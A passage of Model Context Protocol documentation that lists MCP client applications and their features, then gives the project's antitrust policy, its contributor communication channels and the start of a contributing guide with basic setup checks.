* [Lutra AI agent explained (video)](https://www.youtube.com/watch?v=W5ZpN0cMY70)
MCP Bundler is perfect local proxy for your MCP workflow. The app centralizes all your MCP servers — toggle, group, turn off capabilities instantly. Switch bundles on the fly inside the MCP Bundler.
**Key features:**
* Unified Control Panel: Manage all your MCP servers — both Local STDIO and Remote HTTP/SSE — from one clear macOS window. Start, stop, or edit them instantly without touching configs.
* One Click, All Connected: Launch or disable entire MCP setups with one toggle. Switch bundles per project or workspace and keep your AI tools synced automatically.
* Per-Tool Control: Enable or hide individual tools inside each server. Keep your bundles clean, lightweight, and tailored for every AI workflow.
* Instant Health & Logs: Real-time health indicators and request logs show exactly what's running. Diagnose and fix connection issues without leaving the app.
* Auto-Generate MCP Config: Copy a ready-made JSON snippet for any client in seconds. No manual wiring — connect your Bundler as a single MCP endpoint.
**Learn more:**
* [MCP Bundler in action (video)](https://www.youtube.com/watch?v=CEHVSShw_NU)
MCPBundles provides MCPBundle Studio, a browser-based MCP client for testing and executing MCP tools on remote MCP servers.
**Key features:**
* Discover and inspect available tools with parameter schemas and descriptions
* Supports OAuth and API key authentication for secure provider connections
* Execute MCP tools with form-based and chat based input
* Implements Apps for rendering interactive UI responses from tools
* Streamable HTTP transport for remote MCP server connections
mcp-agent is a simple, composable framework to build agents using Model Context Protocol.
**Key features:**
* Automatic connection management of MCP servers.
* Expose tools from multiple servers to an LLM.
* Implements every pattern defined in [Building Effective Agents](https://www.anthropic.com/research/building-effective-agents).
* Supports workflow pause/resume signals, such as waiting for human feedback.
mcp-client-chatbot is a local-first chatbot built with Vercel's Next.js, AI SDK, and Shadcn UI.
**Key features:**
* It supports standard MCP tool calling and includes both a custom MCP server and a standalone UI for testing MCP tools outside the chat flow.
* All MCP tools are provided to the LLM by default, but the project also includes an optional `@toolname` mention feature to make tool invocation more explicit—particularly useful when connecting to multiple MCP servers with many tools.
* Visual workflow builder that lets you create custom tools by chaining LLM nodes and MCP tools together. Published workflows become callable as `@workflow_name` tools in chat, enabling complex multi-step automation sequences.
mcp-use is an open source python library to very easily connect any LLM to any MCP server both locally and remotely.
**Key features:**
* Very simple interface to connect any LLM to any MCP.
* Support the creation of custom agents, workflows.
* Supports connection to multiple MCP servers simultaneously.
* Supports all langchain supported models, also locally.
* Offers efficient tool orchestration and search functionalities.
`mcpc` is a universal CLI client for MCP that maps MCP operations to intuitive commands for interactive shell use, scripts, and AI coding agents.
**Key features:**
* Swiss Army knife for MCP: supports stdio and streamable HTTP, server config files and zero config, OAuth 2.1, HTTP headers, and main MCP features.
* Persistent sessions for interaction with multiple servers simultaneously.
* Structured text output enables AI agents to explore and interact with MCP servers.
* JSON output and schema validation allow stable integration with other CLI tools, scripting, and MCP **code mode** in a shell.
* Proxy MCP server to provide AI code sandboxes with secure access to authenticated MCP sessions.
MCPHub is a powerful Neovim plugin that integrates MCP (Model Context Protocol) servers into your workflow.
**Key features:**
* Install, configure and manage MCP servers with an intuitive UI.
* Built-in Neovim MCP server with support for file operations (read, write, search, replace), command execution, terminal integration, LSP integration, buffers, and diagnostics.
* Create Lua-based MCP servers directly in Neovim.
* Integrates with popular Neovim chat plugins Avante.nvim and CodeCompanion.nvim
MCPJam Inspector is the local development client for ChatGPT apps, MCP ext-apps, and MCP servers.
**Key features:**
* Local emulator for ChatGPT Apps SDK and MCP ext-apps. No more ChatGPT subscription or ngrok needed.
* OAuth debugger to visually inspect MCP server OAuth at every step.
* LLM playground to chat with your MCP server against any LLM. We provide our own API tokens for free.
* Connect, test, and inspect any MCP server that's local or remote. Manually invoke MCP tools, resource, prompts, etc. View all JSON-RPC logs.
* Supports all transports - STDIO, SSE, and Streamable HTTP.
MCPOmni-Connect is a versatile command-line interface (CLI) client designed to connect to various Model Context Protocol (MCP) servers using both stdio and SSE transport.
**Key features:**
* Support for resources, prompts, tools, and sampling
* Agentic mode with ReAct and orchestrator capabilities
* Seamless integration with OpenAI models and other LLMs
* Dynamic tool and resource management across multiple servers
* Support for both stdio and SSE transport protocols
* Comprehensive tool orchestration and resource analysis capabilities
Memex is the first MCP client and MCP server builder - all-in-one desktop app. Unlike traditional MCP clients that only consume existing servers, Memex can create custom MCP servers from natural language prompts, immediately integrate them into its toolkit, and use them to solve problems—all within a single conversation.
**Key features:**
* **Prompt-to-MCP Server**: Generate fully functional MCP servers from natural language descriptions
* **Self-Testing & Debugging**: Autonomously test, debug, and improve created MCP servers
* **Universal MCP Client**: Works with any MCP server through intuitive, natural language integration
* **Curated MCP Directory**: Access to tested, one-click installable MCP servers (Neon, Netlify, GitHub, Context7, and more)
* **Multi-Server Orchestration**: Leverage multiple MCP servers simultaneously for complex workflows
**Learn more:**
* [Memex Launch 2: MCP Teams and Agent API](https://memex.tech/blog/memex-launch-2-mcp-teams-and-agent-api-private-preview-125f)
[Memgraph Lab](https://memgraph.com/lab) is a visualization and management tool for Memgraph graph databases. Its [GraphChat](https://memgraph.com/docs/memgraph-lab/features/graphchat) feature lets you query graph data using natural language, with MCP server integrations to extend your AI workflows.
**Key features:**
* Build GraphRAG workflows powered by knowledge graphs as the data backbone
* Connect remote MCP servers via `SSE` or `Streamable HTTP`
* Support for MCP tools, sampling, elicitation, and instructions
* Create multiple agents with different configurations for easy comparison and debugging
* Works with various LLM providers (OpenAI, Azure OpenAI, Anthropic, Gemini, Ollama, DeepSeek)
* Available as a Desktop app or Docker container
**Learn more:**
* [Memgraph Lab: MCP integration](https://memgraph.com/docs/memgraph-lab/features/graphchat#mcp-servers)
Microsoft Copilot Studio is a robust SaaS platform designed for building custom AI-driven applications and intelligent agents, empowering developers to create, deploy, and manage sophisticated AI solutions.
**Key features:**
* Support for MCP tools
* Extend Copilot Studio agents with MCP servers
* Leveraging Microsoft unified, governed, and secure API management solutions
MindPal is a no-code platform for building and running AI agents and multi-agent workflows for business processes.
**Key features:**
* Build custom AI agents with no-code
* Connect any SSE MCP server to extend agent tools
* Create multi-agent workflows for complex business processes
* User-friendly for both technical and non-technical professionals
* Ongoing development with continuous improvement of MCP support
**Learn more:**
* [MindPal MCP Documentation](https://docs.mindpal.io/agent/mcp)
Mistral AI: Le Chat is Mistral AI assistant with MCP support for remote servers and enterprise workflows.
**Key features:**
* Remote MCP server integration
* Enterprise-grade security
* Low-latency, high-throughput interactions with structured data
**Learn more:**
* [Mistral MCP Documentation](https://help.mistral.ai/en/collections/911943-connectors)
modelcontextchat.com is a web-based MCP client designed for working with remote MCP servers, featuring comprehensive authentication support and integration with OpenRouter.
**Key features:**
* Web-based interface for remote MCP server connections
* Header-based Authorization support for secure server access
* OAuth authentication integration
* OpenRouter API Key support for accessing various LLM providers
* No installation required - accessible from any web browser
MooPoint is a web-based AI chat platform built for developers and advanced users, letting you interact with multiple large language models (LLMs) through a single, unified interface. Connect your own API keys (OpenAI, Anthropic, and more) and securely manage custom MCP server integrations.
**Key features:**
* Accessible from any PC or smartphone—no installation required
* Choose your preferred LLM provider
* Supports `SSE`, `Streamable HTTP`, `npx`, and `uvx` MCP servers
* OAuth and sampling support
* New features added daily
Msty Studio is a privacy-first AI productivity platform that seamlessly integrates local and online language models (LLMs) into customizable workflows. Designed for both technical and non-technical users, Msty Studio offers a suite of tools to enhance AI interactions, automate tasks, and maintain full control over data and model behavior.
**Key features:**
* **Toolbox & Toolsets**: Connect AI models to local tools and scripts using MCP-compliant configurations. Group tools into Toolsets to enable dynamic, multi-step workflows within conversations.
* **Turnstiles**: Create automated, multi-step AI interactions, allowing for complex data processing and decision-making flows.
* **Real-Time Data Integration**: Enhance AI responses with up-to-date information by integrating real-time web search capabilities.
* **Split Chats & Branching**: Engage in parallel conversations with multiple models simultaneously, enabling comparative analysis and diverse perspectives.
**Learn more:**
* [Msty Studio Documentation](https://docs.msty.studio/features/toolbox/tools)
Needle is a RAG workflow platform that also works as an MCP client, letting you connect and use MCP servers in seconds.
**Key features:**
* **Instant MCP integration:** Connect any remote MCP server to your collection in seconds
* **Built-in RAG:** Automatically get retrieval-augmented generation out of the box
* **Secure OAuth:** Safe, token-based authorization when connecting to servers
* **Smart previews:** See what each MCP server can do and selectively enable the tools you need
**Learn more:**
* [Getting Started](https://docs.needle.app/docs/guides/hello-needle/getting-started/)
NVIDIA Agent Intelligence (AIQ) toolkit is a flexible, lightweight, and unifying library that allows you to easily connect existing enterprise agents to data sources and tools across any framework.
**Key features:**
* Acts as an MCP **client** to consume remote tools
* Acts as an MCP **server** to expose tools
* Framework agnostic and compatible with LangChain, CrewAI, Semantic Kernel, and custom agents
* Includes built-in observability and evaluation tools
**Learn more:**
* [AIQ toolkit MCP documentation](https://docs.nvidia.com/aiqtoolkit/latest/workflows/mcp/index.html)
OpenCode is an open source AI coding agent. It’s available as a terminal-based interface, desktop app, or IDE extension.
**Key features:**
* Support for MCP tools
* Support for MCP resources in the cli using `@` prefix
* Support for MCP prompts in the cli as slash commands using `/` prefix
OpenSumi is a framework helps you quickly build AI Native IDE products.
**Key features:**
* Supports MCP tools in OpenSumi
* Supports built-in IDE MCP servers and custom MCP servers
oterm is a terminal client for Ollama allowing users to create chats/agents.
**Key features:**
* Support for multiple fully customizable chat sessions with Ollama connected with tools.
* Support for MCP tools.
Postman is the most popular API client and now supports MCP server testing and debugging.
**Key features:**
* Full support of all major MCP features (tools, prompts, resources, and subscriptions)
* Fast, seamless UI for debugging MCP capabilities
* MCP config integration (Claude, VSCode, etc.) for fast first-time experience in testing MCPs
* Integration with history, variables, and collections for reuse and collaboration
Proxyman is a native macOS app for HTTP debugging and network monitoring. It now includes an MCP Server that enables AI assistants (Claude, Cursor, and other MCP-compatible tools) to directly interact with Proxyman for inspecting HTTP traffic, creating debugging rules, and controlling the app through natural language.
**Key features:**
* **AI-Powered Debugging**: Ask AI to analyze captured traffic, find specific requests, or explain API responses
* **Hands-Free Rule Creation**: Create breakpoints, map local/remote rules through conversation
* **Traffic Inspection Tools**: Get flows, flow details, export cURL commands, and filter traffic with multiple criteria
* **Session Control**: Clear sessions, toggle recording, and manage SSL proxying domains
* **Secure by Design**: Localhost-only server with per-session token authentication
**Learn more:**
* [Proxyman MCP Documentation](https://docs.proxyman.com/mcp)
* [Proxyman Website](https://proxyman.com)
RecurseChat is a powerful, fast, local-first chat client with MCP support. RecurseChat supports multiple AI providers including LLaMA.cpp, Ollama, and OpenAI, Anthropic.
**Key features:**
* Local AI: Support MCP with Ollama models.
* MCP Tools: Individual MCP server management. Easily visualize the connection states of MCP servers.
* MCP Import: Import configuration from Claude Desktop app or JSON
**Learn more:**
* [RecurseChat docs](https://recurse.chat/docs/features/mcp/)
Replit Agent is an AI-powered software development tool that builds and deploys applications through natural language. It supports MCP integration, enabling users to extend the agent's capabilities with custom tools and data sources.
**Learn more:**
* [Replit MCP Documentation](https://docs.replit.com/replitai/mcp/overview)
* [MCP Install Links](https://docs.replit.com/replitai/mcp/install-links)
Roo Code enables AI coding assistance via MCP.
**Key features:**
* Support for MCP tools and resources
* Integration with development workflows
* Extensible AI capabilities
[rtrvr.ai](https://rtrvr.ai) is AI Web Agent Chrome Extension that autonomously runs complex browser workflows, retrieves data to Sheets, and calls API's/MCP Servers – all with just prompting and within your own browser!
**Key features:**
* Easy MCP Integration within your browser: Just open the Chrome Extension, add the server URL, and prompt server calls with the web as context!
* Remote control your browser by turning your browser into MCP Server: Just copy/paste MCP URL into any MCP Client (no npx needed), and trigger agentic browser workflows!
* Prompt our agent to execute workflows combining web agentic actions with MCP tool calls; find someone's email on the web and then send them an email with Zapier MCP.
* Reusable and Schedulable Automations: After running a workflow, easily rerun or put on a schedule to execute in the background while you do other tasks in your browser.
Shortwave is an AI-powered email client that supports MCP tools to enhance email productivity and workflow automation.
**Key features:**
* MCP tool integration for enhanced email workflows
* Rich UI for adding, managing and interacting with a wide range of MCP servers
* Support for both remote (Streamable HTTP and SSE) and local (Stdio) MCP servers
* AI assistance for managing your emails, calendar, tasks and other third-party services
Simtheory is an agentic AI workspace that unifies multiple AI models, tools, and capabilities under a single subscription. It provides comprehensive MCP support through its MCP Store, allowing users to extend their workspace with productivity tools and integrations.
**Key features:**
* **MCP Store**: Marketplace for productivity tools and MCP server integrations
* **Parallel Tasking**: Run multiple AI tasks simultaneously with MCP tool support
* **Model Catalogue**: Access to frontier models with MCP tool integration
* **Hosted MCP Servers**: Plug-and-play MCP integrations with no technical setup
* **Advanced MCPs**: Specialized tools like Tripo3D (3D creation), Podcast Maker, and Video Maker
* **Enterprise Ready**: Flexible workspaces with granular access control for MCP tools
**Learn more:**
* [Simtheory website](https://simtheory.ai)
Slack MCP Client acts as a bridge between Slack and Model Context Protocol (MCP) servers. Using Slack as the interface, it enables large language models (LLMs) to connect and interact with various MCP servers through standardized MCP tools.
**Key features:**
* **Supports Popular LLM Providers:** Integrates seamlessly with leading large language model providers such as OpenAI, Anthropic, and Ollama, allowing users to leverage advanced conversational AI and orchestration capabilities within Slack.
* **Dynamic and Secure Integration:** Supports dynamic registration of MCP tools, works in both channels and direct messages and manages credentials securely via environment variables or Kubernetes secrets.
* **Easy Deployment and Extensibility:** Offers official Docker images, a Helm chart for Kubernetes, and Docker Compose for local development, making it simple to deploy, configure, and extend with additional MCP servers or tools.
Smithery Playground is a developer-first MCP client for exploring, testing and debugging MCP servers against LLMs. It provides detailed traces of MCP RPCs to help troubleshoot implementation issues.
**Key features:**
* One-click connect to MCP servers via URL or from Smithery's registry
* Develop MCP servers that are running on localhost
* Inspect tools, prompts, resources, and sampling configurations with live previews
* Run conversational or raw tool calls to verify MCP behavior before shipping
* Full OAuth MCP-spec support
SpinAI is an open-source TypeScript framework for building observable AI agents. The framework provides native MCP compatibility, allowing agents to seamlessly integrate with MCP servers and tools.
**Key features:**
* Built-in MCP compatibility for AI agents
* Open-source TypeScript framework
* Observable agent architecture
* Native support for MCP tools integration
Superinterface is AI infrastructure and a developer platform to build in-app AI assistants with support for MCP, interactive components, client-side function calling and more.
**Key features:**
* Use tools from MCP servers in assistants embedded via React components or script tags
* SSE transport support
* Use any AI model from any AI provider (OpenAI, Anthropic, Ollama, others)
Superjoin brings the power of MCP directly into Google Sheets extension. With Superjoin, users can access and invoke MCP tools and agents without leaving their spreadsheets, enabling powerful AI workflows and automation right where their data lives.
**Key features:**
* Native Google Sheets add-on providing effortless access to MCP capabilities
* Supports OAuth 2.1 and header-based authentication for secure and flexible connections
* Compatible with both SSE and Streamable HTTP transport for efficient, real-time streaming communication
* Fully web-based, cross-platform client requiring no additional software installation
Swarms is a production-grade multi-agent orchestration framework that supports MCP integration for dynamic tool discovery and execution.
**Key features:**
* Connects to MCP servers via SSE transport for real-time tool integration
* Automatic tool discovery and loading from MCP servers
* Support for distributed tool functionality across multiple agents
* Enterprise-ready with high availability and observability features
* Modular architecture supporting multiple AI model providers
**Learn more:**
* [Swarms MCP Integration Documentation](https://docs.swarms.world/en/latest/swarms/tools/tools_examples/)
systemprompt is a voice-controlled mobile app that manages your MCP servers. Securely leverage MCP agents from your pocket. Available on iOS and Android.
**Key features:**
* **Native Mobile Experience**: Access and manage your MCP servers anytime, anywhere on both Android and iOS devices
* **Advanced AI-Powered Voice Recognition**: Sophisticated voice recognition engine enhanced with cutting-edge AI and Natural Language Processing (NLP), specifically tuned to understand complex developer terminology and command structures
* **Unified Multi-MCP Server Management**: Effortlessly manage and interact with multiple Model Context Protocol (MCP) servers from a single, centralized mobile application
Tambo is a platform for building custom chat experiences in React, with integrated custom user interface components.
**Key features:**
* Hosted platform with React SDK for integrating chat or other LLM-based experiences into your own app.
* Support for selection of arbitrary React components in the chat experience, with state management and tool calling.
* Support for MCP servers, from Tambo's servers or directly from the browser.
* Supports OAuth 2.1 and custom header-based authentication.
* Support for MCP tools and sampling, with additional MCP features coming soon.
Tencent CloudBase AI DevKit is a tool for building AI agents in minutes, featuring zero-code tools, secure data integration, and extensible plugins via MCP.
**Key features:**
* Support for MCP tools
* Extend agents with MCP servers
* MCP servers hosting: serverless hosting and authentication support
Theia AI is a framework for building AI-enhanced tools and IDEs. The [AI-powered Theia IDE](https://eclipsesource.com/blogs/2024/10/08/introducting-ai-theia-ide/) is an open and flexible development environment built on Theia AI.
**Key features:**
* **Tool Integration**: Theia AI enables AI agents, including those in the Theia IDE, to utilize MCP servers for seamless tool interaction.
* **Customizable Prompts**: The Theia IDE allows users to define and adapt prompts, dynamically integrating MCP servers for tailored workflows.
* **Custom agents**: The Theia IDE supports creating custom agents that leverage MCP capabilities, enabling users to design dedicated workflows on the fly.
Theia AI and Theia IDE's MCP integration provide users with flexibility, making them powerful platforms for exploring and adapting MCP.
**Learn more:**
* [Theia IDE and Theia AI MCP Announcement](https://eclipsesource.com/blogs/2024/12/19/theia-ide-and-theia-ai-support-mcp/)
* [Download the AI-powered Theia IDE](https://theia-ide.org/)
Tome is an open source cross-platform desktop app designed for working with local LLMs and MCP servers. It is designed to be beginner friendly and abstract away the nitty gritty of configuration for people getting started with MCP.
**Key features:**
* MCP servers are managed by Tome so there is no need to install uv or npm or configure JSON
* Users can quickly add or remove MCP servers via UI
* Any tool-supported local model on Ollama is compatible
TypingMind is an advanced frontend for LLMs with MCP support. TypingMind supports all popular LLM providers like OpenAI, Gemini, Claude, and users can use with their own API keys.
**Key features:**
* **MCP Tool Integration**: Once MCP is configured, MCP tools will show up as plugins that can be enabled/disabled easily via the main app interface.
* **Assign MCP Tools to Agents**: TypingMind allows users to create AI agents that have a set of MCP servers assigned.
* **Remote MCP servers**: Allows users to customize where to run the MCP servers via its MCP Connector configuration, allowing the use of MCP tools across multiple devices (laptop, mobile devices, etc.) or control MCP servers from a remote private server.
**Learn more:**
* [TypingMind MCP Document](https://www.typingmind.com/mcp)
* [Download TypingMind (PWA)](https://www.typingmind.com/)
v0 turns your ideas into fullstack apps, no code required. Describe what you want with natural language, and v0 builds it for you. v0 can search the web, inspect sites, automatically fix errors, and integrate with external tools.
**Key features:**
* **Visual to Code**: Create high-fidelity UIs from your wireframes or mockups
* **One-Click Deploy**: Deploy with one click to a secure, scalable infrastructure
* **Web Search**: Search the web for current information and get cited results
* **Site Inspector**: Inspect websites to understand their structure and content
* **Auto Error Fixing**: Automatically fix errors in your code with intelligent diagnostics
* **MCP Integrations**: Connect to MCP servers from the Vercel Marketplace for zero-config setup, or add your own custom MCP servers
**Learn more:**
* [v0 Website](https://v0.app)
VS Code integrates MCP with GitHub Copilot through [agent mode](https://code.visualstudio.com/docs/copilot/chat/chat-agent-mode), allowing direct interaction with MCP-provided tools within your agentic coding workflow. Configure servers in Claude Desktop, workspace or user settings, with guided MCP installation and secure handling of keys in input variables to avoid leaking hard-coded keys.
**Key features:**
* Support for stdio and server-sent events (SSE) transport
* Per-session selection of tools per agent session for optimal performance
* Easy server debugging with restart commands and output logging
* Tool calls with editable inputs and always-allow toggle
* Integration with existing VS Code extension system to register MCP servers from extensions
VT Code is a terminal coding agent that integrates with Model Context Protocol (MCP) servers, focusing on predictable tool permissions and robust transport controls.
**Key features:**
* Connect to MCP servers over stdio; optional experimental RMCP/streamable HTTP support
* Configurable per-provider concurrency, startup/tool timeouts, and retries via `vtcode.toml`
* Pattern-based allowlists for tools, resources, and prompts with provider-level overrides
**Learn more:**
* [MCP Integration Guide](https://github.com/vinhnx/vtcode/blob/main/docs/guides/mcp-integration.md)
Warp is the intelligent terminal with AI and your dev team's knowledge built-in. With natural language capabilities integrated directly into an agentic command line, Warp enables developers to code, automate, and collaborate more efficiently -- all within a terminal that features a modern UX.
**Key features:**
* **Agent Mode with MCP support**: invoke tools and access data from MCP servers using natural language prompts
* **Flexible server management**: add and manage CLI or SSE-based MCP servers via Warp's built-in UI
* **Live tool/resource discovery**: view tools and resources from each running MCP server
* **Configurable startup**: set MCP servers to start automatically with Warp or launch them manually as needed
WhatsMCP is an MCP client for WhatsApp. WhatsMCP lets you interact with your AI stack from the comfort of a WhatsApp chat.
**Key features:**
* Supports MCP tools
* SSE transport, full OAuth2 support
* Chat flow management for WhatsApp messages
* One click setup for connecting to your MCP servers
* In chat management of MCP servers
* Oauth flow natively supported in WhatsApp
Windsurf Editor is an agentic IDE that combines AI assistance with developer workflows. It features an innovative AI Flow system that enables both collaborative and independent AI interactions while maintaining developer control.
**Key features:**
* Revolutionary AI Flow paradigm for human-AI collaboration
* Intelligent code generation and understanding
* Rich development tools with multi-model support
Witsy is an AI desktop assistant, supporting Anthropic models and MCP servers as LLM tools.
**Key features:**
* Multiple MCP servers support
* Tool integration for executing commands and scripts
* Local server connections for enhanced privacy and security
* Easy-install from Smithery.ai
* Open-source, available for macOS, Windows and Linux
Zed is a high-performance code editor with built-in MCP support, focusing on prompt templates and tool integration.
**Key features:**
* Prompt templates surface as slash commands in the editor
* Tool integration for enhanced coding workflows
* Tight integration with editor features and workspace context
* Does not support MCP resources
Zencoder is a coding agent that's available as an extension for VS Code and JetBrains family of IDEs, meeting developers where they already work. It comes with RepoGrokking (deep contextual codebase understanding), agentic pipeline, and the ability to create and share custom agents.
**Key features:**
* RepoGrokking - deep contextual understanding of codebases
* Agentic pipeline - runs, tests, and executes code before outputting it
* Zen Agents platform - ability to build and create custom agents and share with the team
* Integrated MCP tool library with one-click installations
* Specialized agents for Unit and E2E Testing
**Learn more:**
* [Zencoder Documentation](https://docs.zencoder.ai)
## Adding MCP support to your application
If you've added MCP support to your application, we encourage you to submit a pull request to add it to this list. MCP integration can provide your users with powerful contextual AI capabilities and make your application part of the growing MCP ecosystem.
Benefits of adding MCP support:
* Enable users to bring their own context and tools
* Join a growing ecosystem of interoperable AI applications
* Provide users with flexible integration options
* Support local-first AI workflows
To get started with implementing MCP in your application, check out our [Python](https://github.com/modelcontextprotocol/python-sdk) or [TypeScript SDK Documentation](https://github.com/modelcontextprotocol/typescript-sdk)
# Antitrust Policy
Source: https://modelcontextprotocol.io/community/antitrust
MCP Project Antitrust Policy for participants and contributors
**Effective: September 29, 2025**
This policy applies when participating in MCP meetings, Working Groups,
Interest Groups, and other collaborative forums where competitors may be
present. Most individual contributors working on code or documentation don't
need to worry about this in day-to-day work - it's primarily relevant for
group discussions about standards and specifications.
## Introduction
The goal of the Model Context Protocol open source project (the "Project") is to develop a universal standard for model-to-world interactions, including enabling LLMs and agents to seamlessly connect with and utilize external data sources and tools. The purpose of this Antitrust Policy (the "Policy") is to avoid antitrust risks in carrying out this pro-competitive mission.
Participants in and contributors to the Project (collectively, "participants") will use their best reasonable efforts to comply in all respects with all applicable state and federal antitrust and trade regulation laws, and applicable antitrust/competition laws of other countries (collectively, the "Antitrust Laws").
The goal of Antitrust Laws is to encourage vigorous competition. Nothing in this Policy prohibits or limits the ability of participants to make, sell or use any product, or otherwise to compete in the marketplace. This Policy provides general guidance on compliance with Antitrust Law. Participants should contact their respective legal counsel to address specific questions.
This Policy is conservative and is intended to promote compliance with the Antitrust Laws, not to create duties or obligations beyond what the Antitrust Laws actually require. In the event of any inconsistency between this Policy and the Antitrust Laws, the Antitrust Laws preempt and control.
## Participation
Technical participation in the Project shall be open to all, subject only to compliance with the provisions of the Project's charter and other governance documents.
## Conduct of Meetings
At meetings among actual or potential competitors, there is a risk that participants in those meetings may improperly disclose or discuss information in violation of the Antitrust Laws or otherwise act in an anti-competitive manner. To avoid this risk, participants must adhere to the following policies when participating in Project-related or sponsored meetings, conference calls, or other forums (collectively, "Project Meetings").
Participants must not, in fact or appearance, discuss or exchange information regarding:
* An individual company's current or projected prices, price changes, price differentials, markups, discounts, allowances, terms and conditions of sale, including credit terms, etc., or data that bear on prices, including profits, margins or cost.
* Industry-wide pricing policies, price levels, price changes, differentials, or the like.
* Actual or projected changes in industry production, capacity or inventories.
* Matters relating to bids or intentions to bid for particular products, procedures for responding to bid invitations or specific contractual arrangements.
* Plans of individual companies concerning the design, characteristics, production, distribution, marketing or introduction dates of particular products, including proposed territories or customers.
* Matters relating to actual or potential individual suppliers that might have the effect of excluding them from any market or of influencing the business conduct of firms toward such suppliers.
* Matters relating to actual or potential customers that might have the effect of influencing the business conduct of firms toward such customers.
* Individual company current or projected cost of procurement, development or manufacture of any product.
* Individual company market shares for any product or for all products.
* Confidential or otherwise sensitive business plans or strategy.
In connection with all Project Meetings, participants must do the following:
* Adhere to prepared agendas.
* Insist that meeting minutes be prepared and distributed to all participants, and that meeting minutes accurately reflect the matters that transpired.
* Consult with their respective counsel on all antitrust questions related to Project Meetings.
* Protest against any discussions that appear to violate these policies or the Antitrust Laws, leave any meeting in which such discussions continue, and either insist that such protest be noted in the minutes.
## Requirements/Standard Setting
The Project may establish standards, technical requirements and/or specifications for use (collectively, "requirements"). Participants shall not enter into agreements that prohibit or restrict any participant from establishing or adopting any other requirements. Participants shall not undertake any efforts, directly or indirectly, to prevent any firm from manufacturing, selling, or supplying any product not conforming to a requirement.
The Project shall not promote standardization of commercial terms, such as terms for license and sale.
## Contact Information
To contact the Project regarding matters addressed by this Antitrust Policy, please send an email to [antitrust@modelcontextprotocol.io](mailto:antitrust@modelcontextprotocol.io), and reference "Antitrust Policy" in the subject line.
# Contributor Communication
Source: https://modelcontextprotocol.io/community/communication
Communication strategy and framework for the Model Context Protocol community
This document explains how to communicate and collaborate within the Model Context Protocol (MCP) project.
## Communication Channels
| Channel | Purpose | When to Use |
| ----------------------------------------------------------------------------------------------------------- | --------------------- | ------------------------------------------------ |
| [Discord](https://discord.gg/6CSzBmMkjX) | Real-time discussion | Quick questions, coordination, WG/IG discussions |
| [Live calls](https://meet.modelcontextprotocol.io/) | Sync up | WG/IG presentations, progress reports |
| [GitHub Discussions](https://github.com/modelcontextprotocol/modelcontextprotocol/discussions) | Structured discussion | Proposals, roadmap planning, longer-form debate |
| [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) | Actionable tasks | Bug reports, documentation fixes |
| [Vulnerability reports](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/SECURITY.md) | Security issues | Vulnerabilities - **never post publicly** |
All communication is governed by our [Code of Conduct](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/CODE_OF_CONDUCT.md). We expect respectful, professional, and inclusive interactions across all channels.
## Discord
The [MCP Contributor Discord](https://discord.gg/6CSzBmMkjX) is for real-time contributor discussion and collaboration. The server is designed for **MCP contributors** and is not intended for general MCP support.
### Public Channels (Default)
**Purpose:** Open community engagement, collaborative development, and transparent project coordination.
**Primary use cases:**
* SDK and tooling development (e.g., `#typescript-sdk-dev`, `#inspector-dev`)
* [Working Group and Interest Group](/community/working-interest-groups) discussions (e.g., `#auth-wg`, `#security-ig`)
* Community onboarding and contribution guidance
* Community feedback and collaborative brainstorming
* Public office hours and maintainer availability
**Avoid:**
* MCP user support - Read official documentation and use GitHub Discussions for questions
* Service or product marketing - Keep discussions vendor-neutral; mentions of brands are discouraged except as examples relevant to the specification
### Private Channels (Exceptions)
**Purpose:** Confidential coordination and sensitive matters. Access is restricted to designated maintainers.
**Criteria for private use:**
* Security incidents (CVEs, protocol vulnerabilities)
* People matters (maintainer discussions, code of conduct issues)
* Coordination requiring immediate or focused response with a limited audience
* Some channels are read-only for maintainer decision-making
**Transparency requirements:**
* All technical and governance decisions affecting the community must be documented in GitHub Discussions and/or Issues, labeled with `notes`
* Private channels are temporary "incident rooms," not for routine development
* Some matters related to individual contributors may remain private when appropriate
Any significant discussion on Discord that leads to a potential decision or proposal must be moved to GitHub Discussion or Issue for a persistent, searchable record.
## GitHub Discussions
Use for structured, long-form discussion and debate on project direction.
**When to use:**
* Project roadmap planning and milestone discussions
* Announcements and release communications
* Community polls and consensus-building
* Feature requests with context and rationale
* If a repository doesn't have Discussions enabled, use GitHub Issues instead
## GitHub Issues
Use for bug reports and actionable development tasks. Feature requests should go to [GitHub Discussions](https://github.com/modelcontextprotocol/modelcontextprotocol/discussions).
**When to use:**
* Bug reports with reproducible steps
* Documentation improvements with specific scope
* CI/CD problems and infrastructure issues
* Release tasks and milestone tracking
**Note:** SEP proposals are submitted as pull requests to the [`seps/` directory](https://github.com/modelcontextprotocol/modelcontextprotocol/tree/main/seps), not as GitHub Issues. See the [SEP Guidelines](/community/sep-guidelines).
## Security Issues
**Do not post security issues publicly.**
1. Use the private security reporting process in [SECURITY.md](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/SECURITY.md)
2. Contact Lead or [Core Maintainers](/community/governance#current-core-maintainers) directly
3. Follow responsible disclosure guidelines
## Decision Records
All MCP decisions are documented in public channels:
| Type | Location |
| --------------------- | --------------------------------------------------------------------------------------------- |
| Technical decisions | [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) and SEPs |
| Specification changes | [Changelog](https://modelcontextprotocol.io/specification/draft/changelog) |
| Process changes | [Community documentation](https://modelcontextprotocol.io/community/governance) |
| Governance decisions | [GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues) and SEPs |
When documenting decisions, we retain as much context as possible:
* Decision makers
* Background context and motivation
* Options considered
* Rationale for chosen approach
* Implementation steps
# Contributing to MCP
Source: https://modelcontextprotocol.io/community/contributing
How to contribute to the Model Context Protocol project
The Model Context Protocol (MCP) is an open source project that welcomes contributions from the
community. This guide walks you through everything you need to get started.
## Before You Begin
### Prerequisites
Before contributing, ensure you have the following installed and ready:
* **[Git](https://git-scm.com/downloads)** - For cloning repositories and submitting changes
* **[Node.js 24+](https://nodejs.org/)** - Required for building and testing our projects
* **npm** - Comes with Node.js, used for dependency management
* **[GitHub account](https://github.com/signup)** - For submitting pull requests and issues
* **Language-specific tooling** - If contributing to an SDK, you'll need the appropriate
development environment for that language (e.g., Python, Rust, Go)
Verify your setup:
```bash theme={null}
node --version # Should be 24.x or higher
npm --version # Should be 11.x or higher
git --version # Any recent version
```
These commands work the same on macOS, Linux, and Windows, so you're good to
go on any platform.
### Repository Structure
MCP spans multiple repositories in the
